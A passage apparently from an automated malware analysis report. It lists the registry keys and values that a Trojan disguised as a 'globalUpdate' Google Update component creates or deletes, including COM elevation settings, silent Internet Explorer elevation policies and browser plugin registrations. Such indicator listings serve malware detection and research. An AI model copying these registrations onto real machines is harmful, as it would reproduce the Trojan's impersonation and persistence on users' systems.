"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"
[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 1C BB 6D 1B 3E 23 5B CA 34 A3 A7 1F 07 11 88"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"
[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"
[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"
[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:1272 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"
[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1456422024"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"
